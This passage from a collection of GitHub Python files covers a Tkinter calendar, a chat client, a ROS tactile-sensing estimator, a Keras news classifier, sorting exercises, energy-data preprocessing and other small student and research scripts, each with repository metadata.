month_days]['fg'] = 'grey'\n self.days[week_day + n + month_days]['bg'] = '#f3f3f3'\n\n for elem in self.holidays:\n if int(elem[0]) == self.month + 1 and (month_days + int(elem[1]) < 6 * 7):\n self.days[month_days + int(elem[1]) + 1]['bg'] = '#a10000'\n\n self.add_hol_area.insert(END, \"дд.мм (напр: 01.01)\")\n\n def start(self):\n \"\"\"\n loading interface and start it in mainloop\n :return: void\n \"\"\"\n self.root.mainloop()\n\n def _reload_holidays(self):\n \"\"\"\n reload holidays\n :return: void\n \"\"\"\n self.holidays.clear()\n f = open(self.holipath, 'r')\n for elem in f:\n if elem == '\\n':\n break\n month, days = elem.split(sep='.')\n self.holidays.append([month, days])\n f.close()\n\n def _add_holi(self):\n \"\"\"\n add new holidays in list\n :return: void\n \"\"\"\n date = ''.join(char for char in self.add_hol_area.get('1.0', END) if char.isalnum() or char == '.')\n if len(date) != 5 or date[2] != '.' or str(date[0:2] + date[3:5]).isnumeric() == False:\n return\n\n f = open(self.holipath, 'a')\n f.write(date[3:5] + '.' + date[0:2] + '\\n')\n f.close()\n self._fill()\n\n def _rem_holi(self):\n \"\"\"\n rem holidays in list\n :return: void\n \"\"\"\n date = ''.join(char for char in self.add_hol_area.get('1.0', END) if char.isalnum() or char == '.')\n if len(date) != 5 or date[2] != '.' or str(date[0:2] + date[3:5]).isnumeric() == False:\n return\n\n date = date[3:5] + '.' + date[0:2]\n f = open(self.holipath, 'r')\n f2 = open(str(self.holipath + 't'), 'w')\n\n for s in f:\n if s[:5] == date[:5]:\n continue\n f2.write(s + '\\n')\n\n f.close()\n f2.close()\n f = open(self.holipath, 'w')\n f2 = open(str(self.holipath + 't'), 'r')\n\n for s in f2:\n f.write(s + '\\n')\n\n f2.close()\n f.close()\n self._fill()\n","repo_name":"Ruvik1001/Calendar","sub_path":"Lib/MyCalendar.py","file_name":"MyCalendar.py","file_ext":"py","file_size_in_byte":7452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23890437974","text":"import sys\n\nn = int(input())\ndt = [list(map(int,input().split())) for _ in range(n)]\n\nrl = [0,0]\ndef jd(n, x, y):\n\n if n > 1:\n for i in range(x,x+n):\n for j in range(y,y+n):\n if dt[x][y] != dt[i][j]:\n jg = False\n jd(n//2, int(x), y)\n jd(n//2, x+n//2, y)\n jd(n//2, x, y+n//2)\n jd(n//2, x+n//2, y+n//2)\n return\n else:\n continue\n\n if dt[x][y] == 1:\n rl[1] += 1\n else:\n rl[0] += 1\n\n\njd(n,int(0),int(0))\nprint(rl[0])\nprint(rl[1])","repo_name":"leechi2/LCL_WORLD","sub_path":"baekjoon/단계별/분할 정복/2630.py","file_name":"2630.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28199390359","text":"import asyncio\nimport tempfile\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport socketio\nfrom aioconsole import ainput\nDELAY = 0.01\nclient = socketio.AsyncClient()\nCREDS_FILE = Path(\n tempfile.gettempdir(), \"shellhacks_chatserver_auth\")\n\n\ndef display_room_history(message_history):\n for message in message_history:\n timestamp = datetime.fromisoformat(message['timestamp']).time()\n print(timestamp, message['user']['username'] + \":\", message['message'])\n\n\ndef display_rooms(rooms):\n for room in rooms:\n print(F\"{room['name']} ({room['users']})\")\n\n\n@client.event\nasync def chat_message(data):\n timestamp = datetime.fromisoformat(data['timestamp']).time()\n print(timestamp, data['user']['username'] + \":\", data['message'])\n\n\n@client.event\nasync def room_join(username: str):\n print(F\"SERVER: User {username} has joined the room\")\n\n\nasync def read_user_input():\n while True:\n # print(\"[+] \", end='')\n _input: str = await ainput()\n if _input.strip() == '':\n continue\n if _input.lower().startswith('/help'):\n print(\"\"\"Commands available:\n /help: Displays this screen\n /rooms: Displays all available rooms\n /pwr: Displays current room\n /join: Creates a room if it does not exist and joins it, other wise it just joins it\n /history: Displays History of the chat room\n /find: Find a user by username \n /quit: exit the application\"\"\")\n continue\n if _input.lower().strip() in ['/exit', '/quit', '/q']:\n return\n\n if _input.lower().startswith('/pwr'):\n await client.emit('current_room', callback=print)\n await client.sleep(DELAY)\n continue\n\n if _input.lower().startswith('/join '):\n room = _input.split(' ')[1]\n await client.emit('switch_room', room)\n await client.sleep(DELAY)\n continue\n\n if _input.lower().strip() == \"/rooms\":\n await client.emit('list_rooms', callback=display_rooms)\n await client.sleep(DELAY)\n continue\n\n if _input.lower().strip() == \"/history\":\n await client.emit('room_history', callback=display_room_history)\n await client.sleep(DELAY)\n continue\n\n if _input.lower().strip().startswith(\"/find\"):\n def callback(data):\n print(data)\n [_, user, *_] = _input.strip().split(' ')\n\n await client.emit('find_user', data=user, callback=callback)\n await client.sleep(DELAY)\n continue\n\n await client.emit('chat_message', _input)\n await client.sleep(DELAY)\n\n\nasync def main():\n if CREDS_FILE.exists() and CREDS_FILE.read_text():\n username = CREDS_FILE.read_text()\n else:\n username = input(\"Please enter your username: \").replace(\" \", \"_\")\n CREDS_FILE.write_text(username)\n await client.connect('http://34.138.239.197:8080', auth={'username': username})\n\n await read_user_input()\n await client.disconnect()\n\n\nif __name__ == \"__main__\":\n try:\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n except KeyboardInterrupt:\n exit(1)","repo_name":"CavemanJay/shellhacks","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41605583709","text":"from profile_llh import *\n\nimport os\nimport argparse\nfrom datetime import datetime\n\n\ndef compute_sensitivities(interaction,DM,nbins,N,slurm):\n start_time = datetime.now()\n print('Starting ...')\n model_params = np.loadtxt(f'../created_files/model_params_{interaction}_N_{str(N)}.txt')\n len_params = len(model_params)\n print(f'Parameters loaded -- {datetime.now() - start_time} s')\n print()\n if slurm == True:\n job_id = os.getenv('SLURM_ARRAY_TASK_ID')\n break_points=int(len_params/10)\n start = int(job_id)*break_points\n end = (int(job_id)+1)*break_points\n if int(job_id) == 9 and end != len_params:\n end = len_params\n len_list = end - start\n else:\n # run locally\n job_id = 0\n start = job_id\n end = len_params\n len_list = end - start\n\n TS_ = np.zeros(len_list)\n NUIS_ = np.zeros((len_list,2))\n\n for i, params in enumerate(model_params[start:end]):\n g,mphi,mx = params\n t_llh = datetime.now()\n p_llh = ProfileLogLikelihood_DNN(g,mphi,mx,interaction,nbins)\n print(f'LLH Initialized -- {datetime.now() - t_llh} s')\n\n t_min = datetime.now()\n ts,nuis = p_llh(DM)\n # nuis = [1.66,2.53]\n # ts = p_llh.TestStatistics(nuis, DM=DM)\n print(f'LLH Minimizer Complete -- {datetime.now() - t_min} s')\n\n if DM == True:\n fname = 'inj-rec'\n else:\n fname = 'asimov'\n\n print(i,fname,'params = ',params,'TS = ',ts,'n_astro, gamma = ',nuis)\n TS_[i] = ts\n NUIS_[i,:] = nuis\n print(f'Total time elapsed per interaction: {datetime.now() - t_llh} s \\n')\n print()\n\n np.savetxt('../created_files/sensitivities/ts_profile_'+fname+'_N_'+str(N)+'_'+interaction+'_'+str(job_id)+'.txt', TS_)\n np.savetxt('../created_files/sensitivities/nuissance_profile_'+fname+'_N_'+str(N)+'_'+interaction+'_'+str(job_id)+'.txt', NUIS_)\n print('Files saved in ../created_files/sensitivities/')\n print(f'Computation completed -- Total time elapsed: {datetime.now() - start_time}')\n\n\ndef main():\n interaction = args.interaction\n DM = args.DM\n nbins = args.nbins\n N = args.N\n slurm = args.slurm\n compute_sensitivities(interaction,DM,nbins,N,slurm)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='This script creates sensitivities for a given DM model')\n parser.add_argument('--interaction', type=str, choices=['scalar','fermion','vector','fermscal'],required=True , help='Dark Matter - Scattering model')\n parser.add_argument('--DM', required=True, action=argparse.BooleanOptionalAction,help='Compute Asimov (--no-DM) or Inject-Recover (--DM) sensitivities.')\n parser.add_argument('-n', '--nbins', default=25, type=int, help='Number of bins for event parameters (E,RA,DEC)')\n parser.add_argument('-N', default=10, type=int, help='Number of bins for DM parameters (g,mx,mphi)')\n parser.add_argument('--slurm', default=False,action='store_true', help='Defines the cluster array job id')\n args = parser.parse_args()\n main()\n","repo_name":"diyaselis/darkmatter_neutrino_scattering","sub_path":"code/create_profile_sens.py","file_name":"create_profile_sens.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2700745770","text":"# Compute the running median of a sequence of numbers. \n# That is, given a stream of numbers, print out the median of the list so far on each new element.\n\n# Recall that the median of an even-numbered list is the average of the two middle numbers in a sorted list.\n\n# For example, given the sequence [2, 1, 5, 7, 2, 0, 5], your algorithm should print out:\n# 2\n# 1.5\n# 2\n# 3.5\n# 2\n# 2\n# 2\ndef print_median(elements, length_left):\n if length_left % 2 == 0:\n first_num = elements[int((length_left/2)-1)]\n sec_num = elements[int((length_left/2))]\n median = (first_num + sec_num) / 2\n else:\n median = elements[int(length_left // 2)]\n print(median)\n\ndef insertion_sort(elements):\n print(elements[0])\n for i in range(1, len(elements)): \n if i != 1:\n print_median(elements, i)\n anchor = elements[i] \n j = i - 1 \n while j >= 0 and anchor < elements[j]:\n elements[j+1] = elements[j] \n j -= 1\n elements[j+1] = anchor\n print_median(elements, len(elements))\n\n#codebasics solution\ndef place_to_insert(array, key):\n index = 0 #starts algo at first element\n for i in array: #iterates through current stream list\n if i > key: #if the new value is less than any elements\n break #gets out of loop to return the index it should insert at\n else:\n index += 1 #if the new value is greater than any elements -> keep increasing index to insert at\n return index #returns the index new value should be inserted at\ndef insert_to_sorted(array, key):\n index = place_to_insert(array, key) #gets index of where new value should be added in list\n return array[0:index]+[key]+array[index:] #returns list with added element in right position\n\nif __name__ == '__main__':\n elements = [2, 1, 5, 7, 2, 0, 5]\n insertion_sort(elements)\n \n print()\n \n #codebasics solution - uses input of elements in list\n #NOTE: use debugger to see algo in progress\n \n stream = [] #first approach of quicksort where using a separate list\n count = 0 #keeps track of number of elements in stream (for getting median)\n while(True):\n i = int(input())\n count += 1 #incrases count for each element added to stream\n stream = insert_to_sorted(stream, i) #calls second function on the current steam list with the new value i\n if count % 2 == 1: #below is the algo for finding median in current stream list\n print(f\"Median of {stream} : {stream[(count)//2]}\")\n else:\n i1 = count//2\n i2 = (count//2) - 1\n print(f\"Median of {stream} : {(stream[i1] + stream[i2])/2}\")","repo_name":"ishaansathaye/DataStructAlgorithms","sub_path":"InsertionSort/InsertionSortProblems/runningMedian.py","file_name":"runningMedian.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6963664177","text":"import os\nimport rospy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\nfrom tactile_msgs.msg import TactileState\nfrom geometry_msgs.msg import WrenchStamped\n\nfrom tf import TransformListener, TransformBroadcaster\nfrom datetime import datetime\nfrom learn_placing.common import v2l, line_angle_from_rotation, models_theta_plot, preprocess_myrmex, tft, rotation_from_line_angle, cr_plot_setup\nfrom learn_placing.estimators import NetEstimator, PCABaseline, HoughEstimator\n\n\nclass RunEstimators:\n world_frame = \"base_footprint\"\n grasping_frame = \"gripper_grasping_frame\"\n object_frame = \"object\"\n mm_left, mm_right, ft = None, None, None\n\n def __init__(self, trial_path, noise_thresh, publish_image=False):\n self.trial_path = trial_path\n self.noise_thresh = noise_thresh\n self.publish_image = publish_image\n \n # create NN and baseline models\n self.nn = NetEstimator(trial_path)\n self.pca = PCABaseline(noise_thresh=self.noise_thresh)\n self.hough = HoughEstimator(noise_thresh=self.noise_thresh, preproc=\"binary\")\n\n self.ftsub = rospy.Subscriber(\"/wrist_ft\", WrenchStamped, callback=self.ft_cb)\n self.tlsub = rospy.Subscriber(\"/tactile_left\", TactileState, callback=self.tl_cb)\n self.trsub = rospy.Subscriber(\"/tactile_right\", TactileState, callback=self.tr_cb)\n\n if self.publish_image: \n self.bridge = CvBridge()\n self.imgpub = rospy.Publisher(\"/estimator_image\", Image, queue_size=1)\n\n self.br = TransformBroadcaster()\n self.li = TransformListener()\n self.li.waitForTransform(self.world_frame, self.grasping_frame, rospy.Time(0), rospy.Duration(5))\n\n cr_plot_setup()\n \n def tl_cb(self, m): self.mm_left = preprocess_myrmex(m.sensors[0].values)\n def tr_cb(self, m): self.mm_right = preprocess_myrmex(m.sensors[0].values)\n def ft_cb(self, m): self.ft = np.concatenate([v2l(m.wrench.force), v2l(m.wrench.torque)])\n\n def reset_data(self):\n self.mm_left, self.mm_right, self.ft = None, None, None\n\n def estimate(self):\n while np.any([self.mm_left, self.mm_right, self.ft] == None):\n print(\"waiting for data ...\")\n rospy.Rate(1).sleep()\n\n # get gripper and object orientations\n (_, Qwg) = self.li.lookupTransform(self.world_frame, self.grasping_frame, rospy.Time())\n try:\n # TODO make this more sensitive to lost TFs while avoiding extrapolation into the future exception\n (_, Qwo) = self.li.lookupTransform(self.world_frame, self.object_frame, rospy.Time())\n (_, Qgo) = self.li.lookupTransform(self.grasping_frame, self.object_frame, rospy.Time())\n detected = True\n except Exception as e:\n print(f\"ERROR couldn't get transform. ¿is the object being detected?\\n{e}\")\n Qgo = [0,0,0,1]\n detected = False\n\n Qwg = np.array(Qwg)\n Qgo = np.array(Qgo)\n\n # preprocess data\n mm = np.squeeze(np.stack([self.mm_left, self.mm_right]))\n lblth = line_angle_from_rotation(Qgo)\n\n # run models\n (R_nn, nnth), (nnerr, _) = self.nn.estimate_transform(mm, Qgo, Qwg=Qwg, ft=[self.ft.copy()])\n (R_pca, pcath), (pcaerr, _) = self.pca.estimate_transform(mm, Qgo)\n (R_hou, houth), (houerr, _) = self.hough.estimate_transform(mm, Qgo)\n\n print()\n print(f\"LBL {lblth:.4f}\")\n print(f\"NN {nnth:.4f} | {nnerr:.4f}\")\n print(f\"PCA {pcath:.4f} | {pcaerr:.4f}\")\n print(f\"HOU {houth:.4f} | {houerr:.4f}\")\n\n # broadcast transforms\n for name, R in zip([\"nn\", \"pca\", \"hough\"], [R_nn, R_pca, R_hou]):\n if R is None or np.any(np.isnan(np.array(R))): # handle NaNs / models not detecting lines\n print(f\"skipping {name} due to NaN\")\n continue\n\n T = tft.ensure_homog(R)\n self.br.sendTransform(\n [0,0,0],\n tft.quaternion_from_matrix(T),\n rospy.Time.now(),\n f\"object_{name}\",\n self.grasping_frame\n )\n\n if self.publish_image:\n scale=100\n fig, ax = plt.subplots(ncols=1, figsize=1.8*np.array([10,9]))\n\n self.pca.plot_PCs(ax, mm, scale=scale)\n\n if detected:\n lines = [\n # [lblth, f\"OptiTrack (lblth)\", \"green\"],\n # [nnth, f\"NN {nnerr:.3f}\", \"red\"],\n # [pcath, f\"PCA {pcaerr:.3f}\", \"blue\"],\n # [houth, f\"HOU {houerr:.3f}\", \"white\"],\n\n [lblth, \"Ground-truth\", \"white\"],\n [nnth, f\"Tactile-only \", \"red\"],\n [pcath, f\"PCA \", \"#04D9FF\"],\n [houth, f\"Hough \", \"#41F94A\"],\n ]\n else:\n lines = [\n [nnth, f\"Tactile-only \", \"red\"],\n [pcath, f\"PCA \", \"#04D9FF\"],\n [houth, f\"Hough \", \"#41F94A\"],\n ]\n\n models_theta_plot(\n mm_imgs=mm,\n noise_thresh=self.noise_thresh,\n ax=ax,\n fig=fig,\n scale=scale,\n lines=lines\n )\n\n # ax.set_title(f\"Estimation Results [{datetime.now().strftime('%H:%M:%S')}]\")\n fig.tight_layout()\n fig.canvas.draw()\n\n # Now we can save it to a numpy array.\n data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n imgmsg = self.bridge.cv2_to_imgmsg(data, encoding=\"rgb8\")\n self.imgpub.publish(imgmsg)\n plt.close()\n\n result = dict(zip([\"nn\", \"pca\", \"hough\"],\n [\n [tft.ensure_homog(R_nn), nnerr],\n [R_pca, pcaerr],\n [R_hou, houerr],\n ]\n ))\n if detected:\n result.update({\"opti\": [rotation_from_line_angle(lblth), 0]})\n return result\n\nif __name__ == \"__main__\":\n noise_thresh = 0.05\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/ias_training_new_ds/Combined3D/Combined3D_Neps40_static_tactile_2022.09.13_10-41-43\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/ias_training_new_ds/Combined3D/Combined3D_Neps40_static_tactile_gripper_2022.09.13_10-42-03\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/2023.02.13_18-45-21/CombinedAll/CombinedAll_Neps40_static_tactile_2023.02.13_18-45-21\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/2023.02.22_15-25-54/UPC_v1/UPC_v1_Neps60_static_tactile_2023.02.22_15-25-54\"\n\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/chosen_ones/UPC_v1_Neps60_static_tactile_2023.02.23_09-27-55\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/chosen_ones/UPC_v1_Neps60_static_tactile_ft_2023.02.23_14-04-41\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/chosen_ones/UPC_v1_Neps60_static_ft_2023.02.23_14-04-25\"\n trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/2023.02.24_10-41-09/UPC_v1/UPC_v1_Neps60_static_tactile_2023.02.24_10-41-09\"\n\n\n rospy.init_node(\"run_estimator\")\n\n # normal streaming\n re = RunEstimators(trial_path, noise_thresh=noise_thresh, publish_image=True)\n while not rospy.is_shutdown(): re.estimate()\n\n # re = RunEstimators(trial_path, noise_thresh=noise_thresh, publish_image=True)\n # while not rospy.is_shutdown():\n # a = input()\n # if a.lower() == \"q\": break\n\n # re.estimate()\n","repo_name":"llach/learn_placing","sub_path":"execute_placing/run_estimator.py","file_name":"run_estimator.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7960736796","text":"# -*- coding: UTF-8 -*-\n# @Author : Chaos-ThinkPad\n# @Email : WuChao0918@qq.com\n# @Software: PyCharm\n# @Time : 2021-9-1 21:38\n# @Project : Learn.py\n# @File : 进程01.py\n\nimport os\nfrom multiprocessing import Process\nfrom time import sleep\n\n\ndef task1(s, name):\n while True:\n sleep(s)\n print('这是任务1……', os.getpid(), '-----', os.getppid(), name)\n\n\ndef task2(s, name):\n while True:\n sleep(s)\n print('这是任务2……', os.getpid(), '-----', os.getppid(), name)\n\n\nnumber = 1\nif __name__ == '__main__':\n print(os.getpid())\n # 子进程\n p1 = Process(target=task1, name='任务1', args=(2, 'aa'))\n p1.start()\n print(p1.name)\n p2 = Process(target=task2, name='任务2', args=(2, 'bb'))\n p2.start()\n print(p2.name)\n\n while True:\n number += 1\n sleep(0.2)\n if number == 100:\n p1.terminate()\n p2.terminate()\n break\n else:\n print('---->number:', number)\n\n print('*' * 20)\n","repo_name":"wuchaos0918/Learn","sub_path":"python_learn/进程01.py","file_name":"进程01.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5764316827","text":"from flask import Flask, request, jsonify\nfrom subprocess import Popen\nimport random, uuid\nimport argparse\n\nparser = argparse.ArgumentParser(description='Start the server with the given server executable.')\nparser.add_argument(\"--server-executable\", type=str, help=\"The path to the server executable.\", default=\"./builds/server.app/Contents/MacOS/BlonkServer\")\n\napp = Flask(__name__)\n\nrooms = {}\n\n@app.route('/create_room')\ndef create_room():\n port = random.randint(8000, 9000)\n room_key = str(uuid.uuid4())[:8]\n\n Popen([parser.parse_args().server_executable, \"--headless\", \"--port=\" + str(port), \"--key=\" + room_key])\n\n rooms[room_key] = {\"port\": port, \"players\": []}\n\n return {\"status\": \"success\", \"port\": port, \"key\": room_key}\n\n@app.route('/join_room', methods=['POST'])\ndef join_room():\n data = request.json\n room_key = data.get('key')\n\n if room_key in rooms:\n port = rooms[room_key]['port']\n return {\"status\": \"success\", \"port\": port, \"key\": room_key}\n else:\n return {\"status\": \"failed\", \"message\": \"Invalid room key\"}, 400\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=25565)","repo_name":"jcurtis06/blonk","sub_path":"server/master_server.py","file_name":"master_server.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38699611679","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.models import Sequential\nfrom keras.layers import Activation, Dense, Dropout\nfrom sklearn.preprocessing import LabelBinarizer\nimport sklearn.datasets as skds\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport itertools\nfrom sklearn.metrics import confusion_matrix\n\n\n\n# Directorio con los datasets\npath_train = \"dataset/20news-bydate-train\"\nfiles_train = skds.load_files(path_train,load_content=False)\nlabel_index = files_train.target\nlabel_names = files_train.target_names\nlabelled_files = files_train.filenames\ndata_tags = [\"filename\",\"category\",\"news\"]\ndata_list = []\n\n# Cargamos todos los archivos junto con sus valores de categoría y los añadimos a una lista\ni=0\nfor f in labelled_files:\n print(f'Loading file {f}')\n data_list.append((f,label_names[label_index[i]],Path(f).read_text(errors='ignore')))\n i += 1\n\n# Creamos un dataframe que contiene el nombre del archivo, su categoría y su texto\ndata = pd.DataFrame.from_records(data_list, columns=data_tags)\n\n# Parametros de la red\nnum_labels = 20\nvocab_size = 15000\nbatch_size = 100\nnum_epochs = 30\n\n# Dividimos el conjunto en un 80% de entrenamiento y un 20% de test\ntrain_size = int(len(data) * .8)\n\ntrain_posts = data['news'][:train_size]\ntrain_tags = data['category'][:train_size]\ntrain_files_names = data['filename'][:train_size]\n\ntest_posts = data['news'][train_size:]\ntest_tags = data['category'][train_size:]\ntest_files_names = data['filename'][train_size:]\n\n# Necesitamos poder transformar las palabras en tokens que podamos\n# emplear para entrenar la red usando tokenizer\ntokenizer = Tokenizer(num_words=vocab_size)\ntokenizer.fit_on_texts(train_posts)\nx_train = tokenizer.texts_to_matrix(train_posts, mode='tfidf')\nx_test = tokenizer.texts_to_matrix(test_posts, mode='tfidf')\n\n#Para las etiquetas usamos LabelBinarizer para transformarlas\nencoder = LabelBinarizer()\nencoder.fit(train_tags)\ny_train = encoder.transform(train_tags)\ny_test = encoder.transform(test_tags)\n\n\n#Definimos la red neuronal\nmodel = Sequential()\nmodel.add(Dense(512, input_shape=(vocab_size,)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(num_labels))\nmodel.add(Activation('softmax'))\n\n\n#La compilamos usando adam\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n#Entrenamos la red\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=num_epochs,\n verbose=1,\n validation_split=0.1)\n#Evaluamos su tasa de acierto\nscore = model.evaluate(x_test, y_test,\n batch_size=batch_size, verbose=1)\n\nprint('Test accuracy:', score[1])\n\ntext_labels = encoder.classes_\n\nfor i in range(10):\n prediction = model.predict(np.array([x_test[i]]))\n #Escogemos entre las salidas de la red la que tiene un\n # valor probabilistico más alto\n predicted_number=np.argmax(prediction[0])\n predicted_label = text_labels[predicted_number]\n print(test_files_names.iloc[i])\n print('Actual label:' + test_tags.iloc[i]+' Probability: '+str(prediction[0][predicted_number]))\n print(\"Predicted label: \" + predicted_label)\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n # print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\ny_pred = model.predict(x_test)\ncnf_matrix = confusion_matrix(np.argmax(y_test, axis=1), np.argmax(y_pred, axis=1))\n\n# Plot normalized confusion matrix\nfig = plt.figure()\nfig.set_size_inches(14, 12, forward=True)\nfig.align_labels()\n\n# fig.subplots_adjust(left=0.0, right=1.0, bottom=0.0, top=1.0)\nplot_confusion_matrix(cnf_matrix, classes=np.asarray(label_names), normalize=True,\n title='Normalized confusion matrix')\n\nfig.savefig(\"txt_classification-\" + str(num_epochs) + \".png\", pad_inches=5.0)\n","repo_name":"franusierra/keras-lab","sub_path":"ejemplo_texto/ejemplo_texto.py","file_name":"ejemplo_texto.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45221352405","text":"import logging\n\n\ndef get_logger(name, level=None):\n \"\"\"\n Parameters\n ----------\n name: `str`, required\n Name of the logger.\n\n level: `str`, optional (default=None)\n Level of the logger. The default is None.\n\n Returns\n -------\n `logging.Logger`: the logger object will be returned.\n \"\"\"\n level = logging.INFO if level is None else level\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=level)\n logger = logging.getLogger(name)\n logger.setLevel(level)\n return logger\n","repo_name":"shayanfazeli/graphite_pcqm4mv2","sub_path":"graphite/utilities/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"973311252","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\nfrom pathlib import Path\nimport yaml\nimport itertools\n\ndef data_preprocess(years):\n # Data folder\n data = Path('data')\n fp = data/'CAISO_zone_1_.csv'\n\n # Ingest data\n df = pd.read_csv(fp)\n\n # Holidays\n holidays = USFederalHolidayCalendar().holidays()\n\n # Raw data is 2018, 2019, 2020\n for year in years:\n # Split by year and add index, place as first column\n #df_temp = df[df['time'].str.contains(year)].reset_index().drop(columns='index')\n df_temp = df[df['time'].str.contains(year)]\n df_temp['date_time'] = pd.to_datetime(df_temp['time'])\n df_temp['minute'] = df_temp['date_time'].dt.minute\n df_temp = df_temp.loc[df_temp['minute'] == 0].reset_index().drop(columns='index')\n df_temp['time_idx'] = df_temp.index\n first_column = df_temp.pop('time_idx')\n df_temp.insert(0, 'time_idx', first_column)\n \n # Add date related columns\n df_temp['date_time'] = pd.to_datetime(df_temp['time'])\n df_temp['month'] = df_temp['date_time'].dt.month\n df_temp['day'] = df_temp['date_time'].dt.day\n df_temp['hour'] = df_temp['date_time'].dt.hour\n df_temp['month_day'] = df_temp['month'].astype(float) + df_temp['day'].astype(float)/31\n df_temp['day_of_week'] = df_temp['date_time'].dt.day_of_week\n df_temp['holiday'] = pd.to_datetime(df_temp['date_time'].dt.date).isin(holidays).astype(int).astype(str)\n df_temp['series'] = 'A' \n df_temp = df_temp.drop(columns='time')\n\n # Add lags\n lag_list = ['DHI', 'DNI', 'Dew Point', 'Solar Zenith Angle', 'Wind Speed', 'Relative Humidity', 'Temperature']\n for i in lag_list:\n col_ = i + '_lag'\n df_temp[col_] = df_temp[i].shift(1)\n\n # Drop first column with NA\n df_temp = df_temp.iloc[1:,:]\n\n # Save\n name = 'CAISO_zone_1_' + year + '.csv'\n fp_temp = data/name\n df_temp.to_csv(fp_temp, index=False)\n\n #return df_temp\n\nyears = ['2018', '2019', '2020']\ndata_preprocess(years)\n\n\ndef config_compiler(file_name):\n configs = Path('configs')\n config_file = configs/file_name\n \n with open(config_file) as f:\n config = yaml.safe_load(f)\n\n config_dict = {}\n for key in config:\n for k, v in config[key].items():\n config_dict[k] = v\n \n param_key = list(config_dict.keys())\n\n combinations = list(itertools.product(*(config_dict[Name] for Name in param_key)))\n\n return param_key, combinations\n\n\n","repo_name":"Matt-Carney/Energy-Forecasting","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71773503274","text":"from concurrent.futures import process\nfrom tokenize import String\nfrom django.dispatch import receiver\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.template.defaultfilters import title\nfrom django.urls import reverse\nfrom django.contrib import messages\n\nfrom account.models import Account\nfrom .models import *\nimport datetime\nfrom .forms import FormForm, MarkdownForm\nimport mimetypes\n# use default_storage\nfrom django.core.files.storage import default_storage\n# Create your views here.\n\n\ndef index(request):\n form = Init_form.objects.all()\n return render(request, \"form/index.html\", {'form': form})\n\n\ndef generate_filename(file):\n\n filetype = file.name.split(\".\")[-1]\n time_now = datetime.datetime.now(datetime.timezone.utc)\n new_name = time_now.strftime(\n \"%d%m%y, %H%M%S\") + \"_\" + str(len(Transmit_file.objects.all())) + \".\" + filetype\n file.name = 